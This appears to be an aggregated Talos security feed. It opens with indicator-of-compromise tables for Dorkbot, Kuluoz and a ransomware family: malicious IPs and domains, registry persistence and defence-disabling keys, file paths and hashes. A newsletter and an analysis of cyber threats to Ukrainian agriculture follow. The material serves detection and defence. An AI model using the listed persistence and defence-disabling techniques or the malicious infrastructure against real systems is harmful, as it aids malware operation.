Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
178[.]128[.]255[.]179 26
149[.]202[.]64[.]0/27 26
149[.]202[.]122[.]0/27 26
149[.]202[.]248[.]0/22 26
172[.]66[.]41[.]18 15
104[.]20[.]21[.]251 11
172[.]66[.]42[.]238 11
172[.]67[.]2[.]88 8
104[.]20[.]20[.]251 7
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]blockcypher[.]com 26
bitaps[.]com 26
chain[.]so 26
btc[.]blockr[.]io 26
xxxxxxxxxxxxxxxx[.]1k1dxt[.]top 26
Files and or directories created Occurrences
%TEMP%\d19ab989 26
%TEMP%\d19ab989\4710.tmp 26
%TEMP%\d19ab989\a35f.tmp 26
%LOCALAPPDATA%\Microsoft\Office\Groove1\System\CSMIPC.dat 26
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 26
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp 26
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.hta 26
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.txt 26
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.jpeg 26

File Hashes

07d1b61970c982a009d3d3bd455b1ce6628819fbe47cf82d35b3b2d83a6b1690 097a210c11bc3b1d1768d92e0f080382f350da4116177c38bd81ecaf01bf252f 1015da0524bf981e3f7da09097e695418d2aeb20c8dfc027e927ea274c927743 1a201ba2922601f743606e4f8762e042355fb95704ae08f1e9d46539e9a9c53e 24eb2bfa038ccf1002d6c67bb35241514e265dda1e7ed5e310602e385cb942bd 2788aeb4b8ce3220bc2352ecf6f6dc6fc899934691e5f7778c160d43a654c752 2b921630e3606ceded2567dd7c2665ff59d3894e8f17b0c4c515cfcfea9281f6 2c56f82b2109c74ffc9ac8bb6a75a4fadc7b5dbc8c6e4973dc576b4f6e44b3fd 3107cfd1631d01d58fe6bcfddf6bb649286ee1e4632a2f6da9e0522e72adf66c 313a8059da3a543dc1615e4b0e08d9b6ba02b82a915811bed92ec41a6b282cd5 404b2ca147b0fd48ad897ae91ec951500eac740d3641552ed2175075eccd3d91 405cda0e472fc0c7ea7bd7f523bf1eb77c020a68f895d28d8300ecbcaf689dd7 4fae94bd1def53411ff126fcc1b5e91d25f5b42bc0792df01721217194d5cad1 5490d8d2dd89b8298b5a7b5954f30157c40e4a9e7a13e89b3678169b274190c4 614458dcdaebfaf39ac96fef19b98813852061b7f049c332d1a7d96099ec9971 661992c14354d9a884da5c0d354ec2722aa2d4bc7c6c088e9fbea1781408a48d 6660f96c1b098447cb40ac571cb3301e62dab35ed7d603a262e824c55ec0e2ba 673175cc9fc60fed6f87badae959858cc73317e497bbc63be01d412538d8cd4a 6ac22f719648c97dafca9980c3b2cc4d20c65411be0f3823eb5fbd2ad9907935 746617c675d2a770eab8c726ebc402418cebdbb8200734454baadd99caddf189 74f331f2928d6577c9d0767cbb16f5e19cdd9db4302b1f853b02de01e7797eaa 761c6d04388582f39dcb4e11253bd2e05690bee6f1f5ed960dac7b2121946e7f 763c7dd7964eaf334f7840f0b1c73340890b358f2e0892e455cb58b262828716 76578d8841dc939a7eaafb0740943988f084d18871e5e82d88a8474945c290a0 807ab02bc36e5465e67956df8cd09cd0f6baa69e99c80729eef0ef8a486da894
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Dorkbot-9964085-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: ShowSuperHidden
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: Load
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 1081297374
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 1081297374
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Taskman
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Shell
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Update Manager
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 6
<HKCU>\SOFTWARE\UAZI SOFT
Value Name: UaziVer
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Live Installer
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Windows Live
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Live
5
<HKCU>\SOFTWARE\UAZI SOFT 5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: BCSSync
5
Mutexes Occurrences
PuredairyBB9 6
PuredairyBB10 6
PuredairyBB2 6
PuredairyBB4 6
PuredairyBB8 6
PuredairyBB7 6
PuredairyBB6 6
PuredairyBB15 6
PuredairyBB14 6
PuredairyBB13 6
PuredairyBB12 6
PSPSndkvsdvd0199201 6
PuredairyBB1 6
PuredairyBB5 6
PuredairyBB3 6
PuredairyBB16 6
PuredairyBB17 6
PuredairyBB18 6
PuredairyBB22 6
PuredairyBB20 6
PuredairyBB21 6
PuredairyBB19 6
PuredairyBB29 6
PuredairyBB31 6
PuredairyBB23 6
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
20[.]112[.]52[.]29 7
109[.]236[.]82[.]19 6
80[.]82[.]64[.]8 6
93[.]190[.]140[.]103 6
109[.]236[.]82[.]142 6
109[.]236[.]88[.]101 6
94[.]102[.]52[.]22 6
109[.]236[.]88[.]161 6
93[.]190[.]139[.]14 6
217[.]23[.]14[.]136 6
94[.]102[.]52[.]19 6
217[.]23[.]8[.]142 6
109[.]236[.]86[.]119 6
93[.]190[.]140[.]141 6
108[.]59[.]2[.]221 6
109[.]236[.]83[.]12 6
80[.]82[.]65[.]207 6
217[.]23[.]3[.]105 6
217[.]23[.]4[.]220 6
93[.]190[.]140[.]113 6
217[.]23[.]9[.]104 6
93[.]190[.]142[.]191 6
94[.]102[.]51[.]231 6
217[.]23[.]7[.]3 6
80[.]82[.]65[.]199 6
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
microsoft[.]com 7
faumoussuperstars[.]ru 5
powerrembo[.]ru 5
europe[.]pool[.]ntp[.]org 2
go[.]microsoft[.]com 1
www[.]msn[.]com 1
north-america[.]pool[.]ntp[.]org 1
maps[.]pilenga[.]mobi 1
hostnamessimply1[.]effers[.]com 1
apps[.]audimobile[.]info 1
bootstrap4cache[.]com 1
Files and or directories created Occurrences
%APPDATA%\WindowsUpdate 11
%ProgramData%\msodtyzm.exe 7
\RECYCLER 6
\TEMP\C\UPDATE 6
%APPDATA%\WindowsUpdate\MSupdate.exe 6
%TEMP%\temp41.tmp 5
%APPDATA%\WindowsUpdate\Live.exe 5
%TEMP%\apiSoftCA 5
%APPDATA%\Windows Live 5
%APPDATA%\Windows Live\debug_cache_dump_2384394.dmp 5
%APPDATA%\Windows Live\pldufejsya.exe 5
\RECYCLER\S-1-5-21-0243556031-888888379-781862338-18611771 5
%APPDATA%\fcvifgrs 1
%APPDATA%\fcvifgrs\jisgivdt.exe 1
\RECYCLER\S-1-5-21-0243556031-888888379-781862338-1861771 1
%ProgramData%\3741550053 1
%ProgramData%\3741551629 1
%ProgramData%\3741549335 1
%ProgramData%\3741546871 1
%ProgramData%\3741543454 1
%ProgramData%\3741548555 1
%ProgramData%\3741550771 1

File Hashes

0ce367d545da1ed522fe364fdafc4bf39f1aa9aa326d0413c104132464c4b0f5 0ff57cf4b79588ba6c721f78a042e79a8c4e4eb6544dad9147c6918efc0a9bfd 1487cbb9c1025017bf767b8f9feab2bcdd9f500cd4bed79ca334c4eda4df1d71 1a15e5ebecd8f3025b89a1ee2149311bd0883bc62928092980604cecddf5718f 1c21c85c814609bc6db76824eda6333b2d26be11f8736bbb7397e97ad95c9f2e 1d0d652abf31a5b4f9ecf5ee6d201b4d31e977f6fc769a34cd34a5468e362e14 1e358ccc5c00767b2d7518ad5b34639c172a33118f691b6e989c0da4a4067781 29e771b03f40a6cd492b49826238364933a37c65bee5bf7990d711ff14d3511e 2bbac09df0fbb667c042f25c8d4810a08d6a3129a57ec70363debad39f917bd2 32ac146ea9c7899e04a57c42d48407468323b46a40462febfb0453e27466ed11 3ab978d7ba8cadbfa40ce0d1b6acb6922d6f7b2d8322f420bf03db0c44d94755 4faa3a69a429a598863c9369d0b4d572fa01b5bbf567b0d76f5a42f596430003 57d6deb95dad820da83a96f691230e6927f02bd7dc81fd22117a84ce1ff983b1 84055ce5bc4ef2bdf486e82e444e5665c73f4fe627a8734edc463b59f443bfcc 90853a92441d02881129621868f5a83d4fda693e6602a043dae622186b654a0d 90b11cecdac4d67db66c36a3f692361425eaf99c3f243c107e884091d209ee8b 94b5e03c8c149c8065dcf1a3696ca0c0801f6932e3a6b73985081dd36bb04194 9bf72ac43dcab3750686c49abbf1b0835505186a37187b6435539ea871dfd829 adbbf9cf8048f45fce2ad9fb1d681ea9334813a442d6d5b051cd11285fc71154 af69bafe28d0df36ddba5768583cf25bd5cae24b312e17f607c77294b731f0dd b478d67b97fa15e88d047c643232590d1c6c2d2179e330df5bdc78c4e56036ee b7d2ff1e59e0d30e46adf03d7a90dcc0ed83f2ff1e9b35702a70486954f1d3dd c254f12058d6367578b877c09bd219abcc583003db8d15d270ab284bad923234 caf84844a5809c4e1c513299792f95ca26a87c40dc70627e8bddf5b65775206e d401626e94cd830c3037cec51863d3315a97daf17c16f0836914a8ff8424213f
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Worm.Kuluoz-9964104-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 26
<HKCU>\SOFTWARE\TKQJXHIR
Value Name: nnagtvkf
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: iemwudbv
2
<HKCU>\SOFTWARE\PKBQSDOK
Value Name: wfiqbttr
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: deiobboq
2
<HKCU>\SOFTWARE\TEFAPJXX
Value Name: hjlkqasv
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nmvftwdp
2
<HKCU>\SOFTWARE\ROHCSWFU
Value Name: ivxesusr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: rskaarvw
1
<HKCU>\SOFTWARE\ONFHUPBQ
Value Name: qrlpghvv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: dwxwetxw
1
<HKCU>\SOFTWARE\JUNLDJNI
Value Name: paxvvuef
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: buwqaweo
1
<HKCU>\SOFTWARE\QPANUOIR
Value Name: mmvjkbpj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lawgdaar
1
<HKCU>\SOFTWARE\IDIFICQU
Value Name: uqiuudaf
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: uaugufwr
1
<HKCU>\SOFTWARE\EPCSQSNO
Value Name: sdkgxoqv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nojriosh
1
<HKCU>\SOFTWARE\IIBPNATQ
Value Name: qbmgekoa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: tabswxsd
1
<HKCU>\SOFTWARE\CHUFRWHS
Value Name: nhmwllub
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: kawalexr
1
<HKCU>\SOFTWARE\QDCTDCFM
Value Name: ietjtgir
1
<HKCU>\SOFTWARE\JUOBFMWV
Value Name: ucngtfoi
1
Mutexes Occurrences
2GVWNQJz1 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
91[.]196[.]126[.]16 21
88[.]198[.]25[.]17 20
173[.]203[.]113[.]44 19
178[.]33[.]162[.]8 18
176[.]31[.]106[.]226 18
74[.]50[.]60[.]116 18
198[.]24[.]142[.]66 17
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 26

File Hashes

0828aee088e7c191c463dac5a2449474da1b106da5e12b6335f61d2dd3ae320e 0ddf461f926f814d19696d3851f3673c10d69a15fa2d7cfac9552c3af9460c66 12b274776143da76ceea8cfc1b8219535bca09dea1ea6059a48e74dd6a78e80d 160999be2e3f124a106ced958bce6b6f94fbc3645895aa0129e4dedb443011d7 21245351ac8d14c31552d46c0f8ceec6d576a1abae0ab3d5131e25e9e8fefe32 23fec3f833e9a7ee790ea9cad1b205ade2036466282654b2e53f23516553b775 24e1fb11b1c63caf42bc0a9d8df57cb1c84ccb11415f01c56de128d6ceb2ea4e 2bf5a6f99c57bcaddd28a0a8dad595686b9a660843cd4037575d4abb82af8f69 32a01832f4de0f17e438fed6be9f155d9fd30056133681c7474f0114a1731a9b 35a4fe74474b4f7e7f9c777d063097e36a16f509bc3afb9579779c0504b73af4 3a3fae86a4e14a7d50b6c5bc5d78dc12745fa53d240df641e1fc311449368c85 3da619fa973717201422faf7329016a266b27b89f8a39416cac203f75f32259a 405d7737a27f0798b16f85939c3eacfcbe9e5305b4c621dd20bcaffbe994d88f 413f4fcae50cdad66f08e0e3ae083e60e18e54f890492fcd0241deb9dfe81b81 44d0507ee9143aa548ae8a03171b27633f4226abbad172a0456194a2ef2eb507 44d1449c19d3f79a3fe21e2ab9d333a1bea4156565a3106fc2203ccefa869a9b 4979dce8592c0d16bdc6228b9741ef6c315e3bb1ff34de14271fb3499cd0f139 4b7891ed58a08b45b576282afd74fe835845cd4be8c5aab467ad09136e87ec8e 4bc8eb3d2e72a44384b3d824b33a971ace9eae20998dfe8bdd2ab9b9267b5b43 4c6528d000e07485c69f1c32a95967a454fd20864a4ad2c062160d99987822ef 50c108f9fc31557d55216dfe28b9eeac15fe5f1175a089ff196e1129d6ddf593 5730f9ce8c84e6f1c153c247146ac1590fd989a73cdc9dce9d67594b33caf354 5a45837812962153f5d480918eab77093394dd41c45c610ffd142461ab433668 5e37715cc8a5d1b6c5bed437eea25da495285bb1386cf2aef2b5484fd6c30e69 5ee4adead518246dc926545a0d28e1a488f04d530c49591cc788a8e2b360ad89
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Threat Source newsletter (Aug. 18, 2022) — Why aren't Lockdown modes the default setting on phones?

18 August 2022 at 18:00

By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

As the data privacy landscape gets increasingly murky, app developers and device manufacturers are finding new ways to sure up users’ personal information. Of course, all users have to do is go out of their way to opt-in. 

Apple recently announced a new Lockdown Mode for the iOS operating system that powers the company’s iPhones. When enabled, it turns off many of the features that attackers will exploit when targeting a mobile device with spyware. Spyware is a growing concern across the world, especially the NSO Group’s Pegasus tool.  

With Lockdown Mode enabled, a hypothetical attacker would not have access to certain functions on the phone, and it blocks access to important APIs such as speech and facial recognition, which research has shown are relatively easy to bypass

In a review of Lockdown Mode, Zack Whittaker of TechCrunch said, “...we didn’t find using our iPhone in Lockdown Mode to be overly prohibitive or frustrating as thought when the feature was first announced. Android has its own version of this released in 2018 that only allows users to turn on a Lockdown Mode to disable their device’s fingerprint reader and facial ID scan, only allowing users to log in using only a PIN, password or pattern. However, this feature is turned off immediately after the user successfully logs in again and must be manually re-enabled every time.  

Some individual apps have taken their own steps, like the menstrual cycle-tracking app Flo, which recently announced a new Anonymous Mode that allows users to completely remove their personal data from the app.  

These features should become not only the norm, but the opposite. Much like browser cookies are now thanks to the GDPR, users should have to opt out of these types of modes rather than opting in. I’m skeptical that will ever happen, but if device and app manufacturers are serious about protecting users’ data, users should instead have to tell the device “Yes, I want to use the fingerprint reader and take on the inherent risk” or “yes, I don’t care if you sell my data to third-party advertisers.” 

Right now, these features are buried in a few layers of settings menus, and in the case of Android, it’s not even a permanent change.  

Some startups are trying to solve this problem by going back to the era of “dumb” phones, like The Light Phone, which doesn’t have any web browsing features, or the Mudita Minimalist phone that pretty much only sends calls and text messages and plays music.  

I’m a hypocrite here. Because if one day I was suddenly told I couldn’t check my fantasy football lineups on my phone or didn’t have streaming access to podcasts, I’d probably click whatever big red button there was to turn those features back on. But at the very least, that option should be presented as a big red button and not something you have to Google to figure out how to turn it on.  
  

The one big thing 

While not necessarily the most discussed aspect of Russia’s invasion of Ukraine, it’s important to look at how vital Ukrainian farming is to the world’s food supply chain. And as state-sponsored cyber attacks continue against Ukraine, the potential for grain and food shortages in Europe continues to rise. As Joe Marshall points out in our latest blog post, there are several knock-on effects that could happen if Ukraine’s food production and transportation system were to be disrupted by a major security event.  

Why do I care? 

The agriculture sector is highly vulnerable to cyber-attacks given its low downtime tolerance, insufficient cyber defenses, and far-reaching ripple effects of disruption. Potential cyber attacks on this industry could induce things like a slowdown in production, shipping delays, loss of economic value or supply shortages.  

So now what? 

For executive leadership, now is an opportune time to evaluate your accepted business risks. That means taking the time to understand how interconnected your agriculture operations are to your corporate offices. Could you function as a business should a ransomware attack affect you? What investments have you made to build resiliency in your operations? These are incredibly difficult questions to answer. Use the catalyst of global events to invest in technology and more importantly, people, to help you find those answers. Be proactive, and train for climatic events like a cyber attack. 

 

Top security headlines from the week


As many as 1,900 users of encrypted messaging app Signal could have had their login authentication codes stolen as part of a recent data breach against Twilio. Twilio is a popular gateway other web platforms use to send SMS or voice messages. Signal began notifying users this week of the issue, with one victim saying the attackers used the Twilio access to re-register a new device associated with the user’s phone number, allowing them to send and receive messages from their Signal app. Cloudflare was also a target of the phishing attack, with actors sending users phony text messages warning them their login had been changed, sometimes even contacting the target’s family members. (The Verge, Ars Technica

Some of the world’s top security experts, hackers and defenders unveiled new research at the Black Hat and DEF CON conferences last week. The slate of talks, presentations and exhibits brought to light several high-profile vulnerabilities, including two severe issues in the Zoom video conferencing app. Other heavily discussed topics include the spread of disinformation and election security. In a more lighthearted demonstration, one researcher even showed a way to jailbreak the Linux system on a John Deere tractor to play the video game “Doom” on its center console. (Politico, The Guardian, The Verge

The U.S. Cybersecurity and Infrastructure Security Agency is warning of an uptick in attacks from the Zeppelin ransomware, specifically against critical infrastructure. Threat actors are buying into the ransomware-as-a-service to spread the malware, using SonicWall firewall and remote desktop protocol vulnerabilities to initially breach targeted networks, according to a new CISA advisory. Zeppelin has a new multi-encryption tactic. Once the malware is on a victim’s network, it executes the ransomware multiple times and creates different IDs and encrypted file extensions so the victim can’t simply use one decryption key to return their files. (ThreatPost, CISA


Can’t get enough Talos? 


Upcoming events where you can find Talos 


Livestreamed on Talos' LinkedIn and Twitter

Virtual 

Virtual 

Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: a087b2e6ec57b08c0d0750c60f96a74c     
Typical Filename: AAct.exe     
Claimed Product: N/A       
Detection Name: PUA.Win.Tool.Kmsauto::1201  
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201  

MD5: 0e4c49327e3be816022a233f844a5731 
Typical Filename: aact.exe 
Claimed Product: AAct x86 
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos 

MD5: f1fe671bcefd4630e5ed8b87c9283534 
Typical Filename: KMSAuto Net.exe 
Claimed Product: KMSAuto Net  
Detection Name: PUA.Win.Tool.Hackkms::1201 

Ukraine war spotlights agriculture sector's vulnerability to cyber attack

18 August 2022 at 12:00



By Joe Marshall.

  • The war in Ukraine has caused massive problems for global food supplies, underscoring the high impact of disruptive events to agriculture entities and related organizations.  
  • The challenges to the Ukrainian agriculture sector imposed by the war--and global ripple effects--have been well-documented and garnered international attention. We judge that the current media spotlight on these issues will motivate cyber threat actors to conduct future attacks on this industry as they realize the consequences of prolonged disruption for related entities and potential leverage they would have over victims.  
  • The agriculture sector is highly vulnerable to cyber-attacks given its low downtime tolerance, insufficient cyber defenses, and far-reaching ripple effects of disruption. We assess those future threats to the agriculture section will mainly include financially motivated ransomware actors and disruptive attacks carried out by state-sponsored APTs. 
  • Network defenders and leaders should consider their business resiliency in agriculture or agriculture adjacent industries.

For the past six years, Cisco Talos has been actively involved in assisting public and private institutions in Ukraine to defend themselves against state-sponsored actors. Our involvement ranges from commercial and critical infrastructure to election security. Our presence has afforded us unique opportunities and observations about cybersecurity in a macro and micro way.  

Ukraine has been a frequent victim of state-sponsored cyber-attacks aimed at critical infrastructures like power and transportation. Russia’s invasion of Ukraine not only increased the risk to these sectors but also effectively sparked a global food crisis, with the war driving rising prices and scarcity of many essential foods desperately needed by consumers around the world. The exposed fragility of the global food supply chain will also likely have implications for future cyber threats, as adversaries are notorious for targeting vulnerable sectors with low downtime tolerance and insufficient cyber defenses. This was most recently seen in the wave of ransomware attacks against health care entities during the COVID-19 pandemic. 

To truly grasp the implications of the war in Ukraine, we must examine how vital Ukrainian agriculture feeds the world, the current situation, and what this means for the global cybersecurity posture to protect agricultural assets.  


Threats to agriculture sector likely to grow with Ukraine war 

Ransomware cartels and their affiliates are actively targeting the agricultural industry. Moreover, these actors have done their homework and are targeting agricultural companies during the two times of the year where they cannot suffer disruptions: planting and harvesting. According to an April 2022 FBI alert, “Cyber actors may perceive cooperatives as lucrative targets with a willingness to pay due to the time-sensitive role they play in agricultural production.” Adversaries are known to be shrewd and calculating and understand their victims’ weaknesses and industries—key reasons why they are frequently successful in their operations.  
 
While we know that the agriculture sector is vulnerable, the war in Ukraine has exacerbated this threat, clearly demonstrating the global consequences of disruptive activity.  The world is already facing several stresses on the global economy and supply chain, including rising costs of food, inflation and the ongoing COVID-19 pandemic. Food insecurity, starvation and additional global unrest are all but assured as the war in Ukraine rages on. To truly grasp the enormity of this, let’s look at Ukraine, a massive global supplier of agriculture and the implications for global agriculture security. 
 

Just how important is Ukraine in global agriculture? 

Ukraine is often referred to as the “Breadbasket of Europe,” and it is a well-earned moniker.  
As of 2021, Ukraine was the sixth-largest exporter of wheat in the world, accounting for 10% of the market share. The country produced 20 million tons of wheat, with Egypt, Indonesia, Turkey, Pakistan and Bangladesh as the primary destinations. Many countries impacted by the ripple effects of the war in Ukraine are already highly vulnerable, particularly those in Africa, the Middle East, and parts of Asia. In Ethiopia, Somalia, and Kenya, the number of people facing extreme hunger has more than doubled since last year. In Afghanistan, humanitarian agencies have warned that the country has been close to famine for months, while Lebanon has been in an economic crisis for over a year. 
 
At home, Ukraine relies heavily on farming as a key source of revenue, with agriculture accounting for more than 20% of the country’s GDP, according to the U.N. Agriculture also provides employment for 14% of Ukraine’s population, according to the U.S. Department of Agriculture. Ukraine is unique in that a large portion of the country's land has incredibly fertile soil, with over half the country having well-suited arable land dedicated to crops like wheat, maize and sunflower. Some may assume that swathes of rich land are all that is necessary to be an agriculture giant, but in truth, one needs a well-laid and maintained infrastructure to move crops, seeds and fertilizer, and robust deep-water oceanic ports that can import and export products quickly. Ukraine has all of these features, but they have been largely disrupted or destroyed in the war.  

Understanding the mess of Ukrainian wartime agriculture

It is something of an understatement to say that Ukrainian agriculture exports are in dire straights. Currently, due to the invasion, Ukraine has limited access to seaports to export its extensive backlog of wheat and other agricultural products. Pre-war, 70% of agriculture was exported via seaports, averaging 25 million metric tons a year. This has been reduced to a trickle — only 2 million tons were exported in June alone, a far cry from the 4 million that’s typical of that time of year. Poor countries that cannot shoulder the steep increase in prices will suffer the most. Forty percent of Ukraine’s wheat exports go directly to the U.N. World Food Program, which helps feed these poorer countries. 

Additionally complicating matters is the act of planting and harvesting in Ukraine. Some farm fields are now filled with mines — unexploded ordinances — and farm labor is difficult to find. These factors can create delays that can be catastrophic to the sustainability of a farm's ability to provide food to the world. For example, every day delayed during a planting season could affect the total bushel-per-acre yield, without taking into consideration weather, market conditions, and of course, armed conflict. 

There is also a lack of grain storage capacity for current harvests, as grain is trapped in silos and there are very poor logistics to export out of the country via methods other than bulk oceanic freight. Without the ability to effectively ship last year's harvest, and this year's current harvest being reaped, planting for the 2023’s harvest is in serious jeopardy. All of these complications means Ukraine will effectively have a vastly and painfully reduced presence in the agriculture market for years to come.

Ukraine and Russia recently signed a U.N.-brokered deal, in which an agreement to allow grain shipping exports to resume via the Odessa seaport. This is a much-needed means to deliver trapped grain products in Ukraine, but the agreement is on very precarious footing. Russia is still actively bombing and targeting the Odessa metropolis, and has demonstrated time and again that it is willing to abandon agreements when it suits them. This agreement also runs somewhat counter to the Russian tactic of weaponizing the food supply chain to its advantage. By artificially creating scarcity, Russia can leverage concessions from a global community that relies deeply on Ukrainian grain exports to feed the world. A lack of scarcity could inhibit one of the few cards they can play to compel global compliance to its demands. Starvation and scarcity as a means of control is something the Ukrainian people are quite familiar with

No easy answers  

Ukraine is looking for additional ways to export their trapped agricultural products without the reliance on the pseudo availability of its Odessa seaport, which as of this writing, are very laboriously exporting via rail to other Eastern European countries, or via the Danube River to other countries' seaports. The Bessarabia region, in the Odessa Oblast, has two prominent river ports: Izmail and Reni. These ports, however, are quite old and were not built to ingest and export agriculture at peacetime volumes. Even utilizing seaports reached via river barge, like Constanta in Romania, only offers a small percentage of peacetime oceanic volume.  

Even the Ukrainian rail system is problematic for shipping agricultural products. Ukraine has older Soviet railroad tracks that are incompatible with countries like Poland and cannot just roll trains to the rest of Europe without considerable effort. To put it all succinctly: There are only bad answers to the terrible questions of how to export agriculture in the middle of a Russian invasion. 


So what are the security threat models to agriculture? 

Industry-specific instability is seen as enticing, as victims are seen to be more compliant to pay an extortion fee in exchange for the return of their data and network. The more unstable and exposed the industry, the more compelling it is to an attacker. Nation states may also see agricultural instability as an opportunistic way to project power and advance national interests. 

Critical infrastructure, like agriculture, is part of a complex and interwoven network of critical services that let society function. Cyber attacks on that infrastructure will always carry value to a nation-state advanced persistent threat actor. The ability to disrupt or deny critical services is a potent weapon to enforce one nation’s will over another. Even indirect attacks can affect agriculture. Cyber-attacks launched against energy or water industries can create a ripple effect that impedes the ability of agriculture to produce at optimum. Ukraine has a long history of suffering these kinds of cyber-attacks, including the costly NotPetya attack, that was attributed to Russian APTs

There are also mutual interests that criminal ransomware cartels and the Russian government share. Ransomware cartels are not shy about their relationships with Russia. Many ransomware gangs also operate within that country's borders with relative impunity. These groups, who often act as proxy state-sponsored actors, have financial interests that align with the Russian government. Russia is kinetically targeting agriculture with the express intent of creating additional food chain supply insecurity. Ransomware cartels also want to extort victims and additional food and supply chain disruptions continue to favor Russian interests.  

